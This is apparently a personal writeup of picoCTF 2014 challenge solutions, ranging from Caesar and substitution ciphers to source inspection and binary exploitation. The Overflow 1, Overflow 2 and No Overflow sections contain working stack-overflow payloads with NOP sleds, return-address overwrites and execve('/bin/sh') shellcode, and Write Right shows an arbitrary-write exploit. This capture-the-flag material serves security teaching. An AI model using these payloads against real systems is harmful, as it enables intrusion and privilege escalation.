Hello! Today I'm going to write simple writeups (without the reasoning) to wrap up what I solved in picoCTF 2014. Please feel free to ask questions about specific problems or the reasoning in the comments. Hope you enjoy.
Tyrannosaurus Hex - 10
No Comment - 20
In Chrome, right-click the page and choose "Inspect element";
"<!-- In case you forget, the password for this site is: flag_bf207f2786e38ceb49fa66d36f996d5ac2cbfd6b -->"
Common Vulnerability Exercise - 20
Caesar - 20
vjgugetgvrcuurjtcugkudnekgavqkpsqvzvihlvwmrwbpqtiha
go to http://nayuki.eigenstate.org/page/automatic-caesar-cipher-breaker-javascript
enter the message, then click "Break code!".
thesecretpassphraseisblcieytoinqotxtgfjtukpuznorgfy
The Valley of Fear - 20
Internet Inspection - 30
RoboPhoto - 30
This is the Endian - 40
Supercow - 40
/home/daedalus/supercow
. Can you figure out how to get it to print out the flag?
Simply create a symbolic link from the flag text file to a .cow file.
pico19855@shell:~$ cd /home/daedalus
pico19855@shell:/home/daedalus$ ls
flag.txt hint.cow secret1.cow secret2.cow supercow supercow.c
pico19855@shell:/home/daedalus$ ./supercow secret1.cow
____________
< cow_text_1 >
------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
pico19855@shell:/home/daedalus$ ln -s flag.txt /home_users/pico19855/asdf.cow
pico19855@shell:/home/daedalus$ ./supercow /home_users/pico19855/asdf.cow
______________
< I_LOV_BNANAS >
--------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
Grep is Still Your Friend - 40
daedaluscorp.txt.enc
. The file is stored on the shell server at /problems/grepfriend/keys.
Grep it.
pico19855@shell:/home/daedalus$ cd /problems/grepfriend
pico19855@shell:/problems/grepfriend$ grep "daedaluscorp.txt.enc" *
daedaluscorp.txt.enc b2bee8664b754d0c85c4c0303134bca6
pico19855@shell:/problems/grepfriend$
Javascrypt - 40
alert(key); on your javascript console. (The key differs.)
The page at https://picoctf.com says: flag_3645
Easy Overflow - 40
nc vuln2014.picoctf.com 50000
'nc' is the Linux netcat command. Try running it in the shell.
If a signed 32-bit integer overflows past its maximum, the value wraps around to a negative number.
pico19855@shell:~$ nc vuln2014.picoctf.com 50000
Your number is 1712058. Can you make it negative by adding a positive integer?
2145771590
Congratulations! The sum is -2147483648. Here is the flag: That_was_easssy!
Write Right - 50
/home/write_right/
on the shell server. The source can be found here.
pico19855@shell:/home/write_right$ cat write_right.c
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
/* Compared against 0x1337beef in main(); no statement in the program assigns
 * it directly, so it can only change through main()'s user-directed store. */
unsigned secret = 0xdeadbeef;
/* Grants one user-controlled store, then checks whether it changed `secret`.
 * Both scanf() calls are unchecked: on malformed input `ptr` and `value` are
 * never initialised and the store below is undefined behaviour. main falls
 * off the end without a return statement (implicitly 0 in C99). */
int main(int argc, char **argv){
unsigned *ptr;
unsigned value;
char key[33];
FILE *f;
printf("Welcome! I will grant you one arbitrary write!\n");
printf("Where do you want to write to? ");
/* Destination is taken straight from stdin with no range check -- this is
 * the arbitrary-write primitive the challenge name refers to. */
scanf("%p", &ptr);
printf("Okay! What do you want to write there? ");
/* %p stores a pointer-sized value into an unsigned through a cast; only
 * sound where pointer and unsigned have the same width (the gdb listing
 * below shows 32-bit addresses -- presumably a 32-bit build; confirm). */
scanf("%p", (void **)&value);
printf("Writing %p to %p...\n", (void *)value, (void *)ptr);
*ptr = value; /* the unchecked store; nothing else in the program writes `secret` */
printf("Value written!\n");
if (secret == 0x1337beef){
printf("Woah! You changed my secret!\n");
printf("I guess this means you get a flag now...\n");
f = fopen("flag.txt", "r"); /* NULL if flag.txt is unreadable; never checked */
fgets(key, 32, f); /* fgets on a NULL FILE* is undefined; reads at most 31 chars into key[33] */
fclose(f);
puts(key);
exit(0);
}
printf("My secret is still safe! Sorry.\n");
}
pico19855@shell:/home/write_right$ gdb -q write_right
Reading symbols from write_right...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
0x080485cd <+0>: push %ebp
<cont..>
0x0804865b <+142>: movl $0x8048831,(%esp)
0x08048662 <+149>: call 0x8048470 <puts@plt>
0x08048667 <+154>: mov 0x804a03c,%eax //address of variable 'secret'-overwrite this.
0x0804866c <+159>: cmp $0x1337beef,%eax
<cont...>
0x080486fc <+303>: call 0x8048460 <__stack_chk_fail@plt>
0x08048701 <+308>: leave
0x08048702 <+309>: ret
End of assembler dump.
(gdb) x/wx 0x804a03c
0x804a03c <secret>: 0xdeadbeef
(gdb) q
pico19855@shell:/home/write_right$ ./write_right
Welcome! I will grant you one arbitrary write!
Where do you want to write to? 0x804a03c
Okay! What do you want to write there? 1337beef
Writing 0x1337beef to 0x804a03c...
Value written!
Woah! You changed my secret!
I guess this means you get a flag now...
arbitrary_write_is_always_right
pico19855@shell:/home/write_right$
Overflow 1 - 50
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Replaces the process with an interactive shell after making the effective
 * gid the real and saved gid as well. Reached only from vuln() below.
 * getegid() and setresgid() are declared in <unistd.h>, which this listing
 * does not include. */
void give_shell(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}

/* strcpy() into a 16-byte stack buffer with no length check: an argument of
 * 16 or more characters (plus the terminating NUL) runs past buf into
 * whatever the compiler laid out next to it. `secret` is set to 0 here and
 * never assigned again, so the comparison below can only be satisfied by
 * that overrun; a bounded copy (snprintf(buf, sizeof buf, "%s", input))
 * would close it. */
void vuln(char *input){
    char buf[16];
    int secret = 0;
    strcpy(buf, input);
    if (secret == 0xc0deface){
        give_shell();
    }else{
        printf("The secret is %x\n", secret);
    }
}

/* Passes the first command-line argument, unvalidated, to vuln(). */
int main(int argc, char **argv){
    if (argc > 1)
        vuln(argv[1]);
    return 0;
}

/* --- shell transcript from the writeup, not part of overflow1.c ---
pico19855@shell:/home/overflow1$ ls
flag.txt Makefile overflow1 overflow1.c
pico19855@shell:/home/overflow1$ ./overflow1 `perl -e 'print "\x90"x16, "\xce\xfa\xde\xc0"'`
$ cat flag.txt
ooh_so_critical
*/
Toaster Control - 50
Toaster Defense System Controls
Shutting down
Shutdown code: flag_c49bdkeekr5zqgvc20vc
ZOR - 50
ZOR.py:
#!/usr/bin/python
import sys
""" Daedalus Corporation encryption script. """

# XORs every character of input_data with the single integer key.
# Applying it twice with the same key returns the original text, which is
# why decrypt() below is simply encrypt().
def xor(input_data, key):
    result = ""
    for ch in input_data:
        result += chr(ord(ch) ^ key)
    return result

# Folds the whole password into ONE byte: each character contributes
# (2 * ord(ch) + 3) & 0xff, combined by XOR. Whatever the password length,
# only 256 distinct keys are possible, so the output is recoverable by
# trying every key value.
def encrypt(input_data, password):
    key = 0
    for ch in password:
        key ^= ((2 * ord(ch) + 3) & 0xff)
    return xor(input_data, key)

# XOR is its own inverse, so decryption is the same operation as encryption.
def decrypt(input_data, password):
    return encrypt(input_data, password)

# Prints the command-line contract and exits.
def usage():
    print("Usage: %s [encrypt/decrypt] [in_file] [out_file] [password]" % sys.argv[0])
    exit()

# argv: [1] mode, [2] input path, [3] output path, [4] password.
# The input file handle is never closed, and nothing in this listing calls
# main() -- the invocation line was presumably lost when the script was
# pasted; confirm against the original file.
def main():
    if len(sys.argv) < 5:
        usage()
    input_data = open(sys.argv[2], 'r').read()
    result_data = ""
    if sys.argv[1] == "encrypt":
        result_data = encrypt(input_data, sys.argv[4])
    elif sys.argv[1] == "decrypt":
        result_data = decrypt(input_data, sys.argv[4])
    else:
        usage()
    out_file = open(sys.argv[3], 'w')
    out_file.write(result_data)
    out_file.close()
#!/usr/bin/python
# Ciphertext under test -- presumably the raw contents of the encrypted file
# pasted as a literal; confirm it survived the paste intact.
input_data='Vjkq"ogqqceg"kq"dmp"Fcgfcnwq"Amprmpcvkml"mln{,"Mwp"`nwgrpklvq"dmp"vjg"A{`mpe"cpg"rpmvgavgf"ukvj"c"rcqqumpf,"Vjcv"rcqqumpf"kq":da0c251dc0gfffcd:f6a6`ca4c:`g'
# Unused: the for-loop over the key space rebinds `password` on every iteration.
password=[]
def xor(input_data, key):
    # Same single-byte XOR as ZOR.py: every character code is combined with
    # the integer key and the string is rebuilt from the results.
    return "".join(chr(ord(ch) ^ key) for ch in input_data)
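# Try every possible single-byte key; the one readable candidate among the 256
# outputs is the plaintext. The print() form runs under both Python 2 and 3
# (the original print statement is Python-2-only syntax).
for password in range(256):
    result = xor(input_data, password)
    print(result + "\n")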
tHISMESSAGEISFORdAEDALUScORPORATIONONLYoURBLUEPRINTSFORTHEcYBORGAREPROTECTEDWITHAPASSWORDtHATPASSWORDISFCAFAEDDDAFDCBACABE
Substitution - 50
encrypted.txt:
mid ofminzujomunc snvd ug kumiobbmidsnbnzgnwmidkucv ynf miucq ue oc ulcnzocm gotold ocv ynftd addc gn eocy xbosdg u lfdgg um efgm ad gn afm gmubb u soccnm gdd uw mid gotold ncd ug ed ink soc midzd ad gn efsi miom ynf vncm qcnk ynf vncm qcnk ynf miucq ynf nkc kiomdtdz bocv ynf bocv nc mid dozmi ug rfgm o vdov miucl ynf soc sboue afm u qcnk dtdzy znsq ocv mzdd ocv szdomfzd iog o buwd iog o gxuzum iog o coed ynf miucq mid ncby xdnxbd kin ozd xdnxbd ozd mid xdnxbd kin bnnq ocv miucq buqd ynf afm uw ynf kobq mid wnnmgmdxg nw o gmzocldz ynfbb bdozc miuclg ynf cdtdz qcdk ynf cdtdz qcdk iotd ynf dtdz idozv mid knbw szy mn mid abfd snzc ennc nz ogqdv mid lzuccucl anasom kiy id lzuccdv soc ynf gucl kumi obb mid tnusdg nw mid enfcmoucg soc ynf xoucm kumi obb mid snbnzg nw mid kucv soc ynf xoucm kumi obb mid snbnzg nw mid kucv sned zfc mid iuvvdc xucd mzoubg nw mid wnzdgm sned mogmd mid gfcgkddm adzzudg nw mid dozmi sned znbb uc obb mid zusidg obb oznfcv ynf ocv wnz ncsd cdtdz kncvdz kiom midyzd knzmi mid zoucgmnze ocv mid zutdz ozd ey aznmidzg mid idznc ocv mid nmmdz ozd ey wzudcvg ocv kd ozd obb snccdsmdv mn dosi nmidz uc o suzsbd uc o innx miom cdtdz dcvg ink iuli kubb mid gysoenzd lznk uw ynf sfm um vnkc midc ynfbb cdtdz qcnk ocv ynfbb cdtdz idoz mid knbw szy mn mid abfd snzc ennc wnz kidmidz kd ozd kiumd nz snxxdz gquccdv kd cddv mn gucl kumi obb mid tnusdg nw mid enfcmoucg kd cddv mn xoucm kumi obb mid snbnzg nw mid kucv ynf soc nkc mid dozmi ocv gmubb obb ynfbb nkc ug dozmi fcmub ynf soc xoucm kumi obb mid snbnzg nw mid kucv
I always use this site. Go there and paste the text above.
the authorization code is withallthecolorsofthewind
you think im an ignorant savage and youve been so many places i guess it must be so but still i cannot see if the savage one is me how can there be so much that you dont know you dont know you think you own whatever land you land on the earth is ~ust a dead thing you can claim but i know every rock and tree and creature has a life has a spirit has a name you think the only people who are people are the people who look and think like you but if you walk the footsteps of a stranger youll learn things you never knew you never knew have you ever heard the wolf cry to the blue corn moon or asked the grinning bobcat why he grinned can you sing with all the voices of the mountains can you paint with all the colors of the wind can you paint with all the colors of the wind come run the hidden pine trails of the forest come taste the sunsweet berries of the earth come roll in all the riches all around you and for once never wonder what theyre worth the rainstorm and the river are my brothers the heron and the otter are my friends and we are all connected to each other in a circle in a hoop that never ends how high will the sycamore grow if you cut it down then youll never know and youll never hear the wolf cry to the blue corn moon for whether we are white or copper skinned we need to sing with all the voices of the mountains we need to paint with all the colors of the wind you can own the earth and still all youll own is earth until you can paint with all the colors of the wind
Function Address - 60
Basic ASM - 60
# and http://en.wikipedia.org/wiki/X86_assembly_language#Syntax. Both gdb and objdump produce # AT&T syntax by default.
MOV $3187,%ebx      //ebx=3187
MOV $26953,%eax     //eax=26953
MOV $19902,%ecx     //ecx=19902
CMP %eax,%ebx       //compare eax and ebx (computes ebx-eax, sets flags)
JL L1               //Jump to L1 if ebx < eax (signed); taken here: 3187 < 26953
JMP L2              //else jump to L2
L1: IMUL %eax,%ebx  //ebx=eax*ebx, ebx=85899211
ADD %eax,%ebx       //ebx+=eax, ebx=85926164
MOV %ebx,%eax       //eax=ebx, eax=85926164
SUB %ecx,%eax       //eax-=ecx, eax=85906262
JMP L3              //goto L3; eax=85906262 is the final value
L2: IMUL %eax,%ebx  //ebx=eax*ebx (not reached: the JL above is taken)
SUB %eax,%ebx       //ebx-=eax
MOV %ebx,%eax       //eax=ebx
ADD %ecx,%eax       //eax+=ecx
L3:
NOP
Delicious! - 60
Welcome! You've been here before.
You're logged in as Dr. Florian Richards.
Today's secret Daedalus code is: session_cookies_are_the_most_delicious
Overflow 2 - 70
shell login: pico19855
Password:
pico19855@shell:/home/overflow2$ ls
flag.txt Makefile overflow2 overflow2.c
pico19855@shell:/home/overflow2$ gdb -q overflow2
Reading symbols from overflow2...(no debugging symbols found)...done.
(gdb) p give_shell
$1 = {<text variable, no debug info>} 0x80484ad <give_shell>
(gdb) q
pico19855@shell:/home/overflow2$ ./overflow2 `perl -e 'print "\x90"x28, "\xad\x84\x04\x08"'`
$ cat flag.txt
controlling_%eip_feels_great
Cyborg Secrets - 80
/home/cyborgsecrets/cyborg-defense
or you can download it here.
ZogH
TODO: REMOVE DEBUG PASSWORD!
DEBUG PASSWORD: 2manyHacks_Debug_Admin_Test____
<gibberish>
pico19855@shell:/home/cyborgsecrets$ ./cyborg_defense 2manyHacks_Debug_Admin_Test_______ _ _____| _ \ | | | | / __ \| | | |__ _ ___ __| | __ _| |_ _ ___ | / \/ ___ _ __ _ __| | | / _` |/ _ \/ _` |/ _` | | | | / __| | | / _ \| '__| '_ \| |/ / (_| | __/ (_| | (_| | | |_| \__ \ | \__/\ (_) | | | |_) ||___/ \__,_|\___|\__,_|\__,_|_|\__,_|___/ \____/\___/|_| | .__/| ||_|Password: 2manyHacks_Debug_Admin_TestAuthorization successful.403-shutdown-for-what
No Overflow - 140
/home/no_overflow/
/* --- writeup notes preceding the listing ---
on the shell server. The source can be found here.
How to find where return address is: Start with about 260 bytes and make your way up until the eip gets changed.
Thanks barrebas for answering some of my questions (as I solved this problem after the competition ended.)
The program limits what you enter. However, if you use a negative number, it won't notice, and also won't set a limit to your inputs.
Don't forget to ulimit -c unlimited in order to make a core file.
pico19855@shell:~$ cat no_overflow.c
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#define BUFSIZE 256

/* Reads `length` bytes from stdin into a BUFSIZE stack buffer and echoes it.
 * `length` is a signed int but read() takes a size_t: a negative value is
 * converted to a huge count, so the caller's `< BUFSIZE` test does not bound
 * this read. read() also does not NUL-terminate and its return value is
 * ignored, so printf("%s") may run past the bytes actually received. */
void greet(int length){
    char buf[BUFSIZE];
    puts("What is your name?");
    read(0, buf, length);
    printf("Hello, %s\n!", buf);
}

/* Makes the effective gid the real and saved gid as well -- presumably
 * because the binary is installed setgid; confirm. */
void be_nice_to_people(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

/* The guard below only rejects lengths >= BUFSIZE and never rejects negative
 * ones; scanf's return is also unchecked, so `length` is uninitialised on
 * non-numeric input. A complete check is `if (length >= 0 && length < BUFSIZE)`. */
int main(int argc, char **argv){
    int length;
    be_nice_to_people();
    puts("How long is your name?");
    scanf("%d", &length);
    if(length < BUFSIZE) //don't allow buffer overflow
        greet(length);
    else
        puts("Length was too long!");
}
pico19855@shell:~$ (echo -1; perl -e 'print "\x90"x245, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\xd8\xd5\xff\xff"';cat)|./no_overflow
How long is your name?
What is your name?
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LC_CTYPE = "UTF-8",
LANG = "en_US.UTF-8"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
Hello, 1Ph//shh/binPS嘯
莽咽昶苔嚆
Segmentation fault (core dumped)
pico19855@shell:~$ gdb -q -c core
[New LWP 5132]
Core was generated by `./no_overflow'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffffd6c5 in ?? ()
(gdb) x/40wx $esp-200
0xffffd5fc: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd60c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd61c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd62c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd63c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd64c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd65c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd66c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd67c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd68c: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb)
0xffffd69c: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd6ac: 0x90909090 0x90909090 0x50c03190 0x732f2f68
0xffffd6bc: 0x622f6868 0xe3896e69 0x6e69622f 0x68732f2f
0xffffd6cc: 0x00000000 0xffffffff 0xffffd6ec 0xffffd79c
0xffffd6dc: 0xf7e4f39d 0xf7fc83c4 0xf7ffd000 0x0804860b
0xffffd6ec: 0xffffffff 0x08048600 0x00000000 0x00000000
0xffffd6fc: 0xf7e35a83 0x00000001 0xffffd794 0xffffd79c
0xffffd70c: 0xf7feacea 0x00000001 0xffffd794 0xffffd734
0xffffd71c: 0x0804a020 0x0804826c 0xf7fc8000 0x00000000
0xffffd72c: 0x00000000 0x00000000 0x1588b43a 0x2c92302a
(gdb) q
pico19855@shell:~$ cd /home/no_overflow
pico19855@shell:/home/no_overflow$ (echo -1; perl -e 'print "\x90"x200, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\x90"x45, "\xfc\xd5\xff\xff"';cat)|./no_overflow
How long is your name?
What is your name?
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LC_CTYPE = "UTF-8",
LANG = "en_US.UTF-8"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
Hello, 1Ph//shh/binPS嘯
莽擎|昶苔嚆
ls
Makefile core flag.txt no_overflow no_overflow.c
cat flag.txt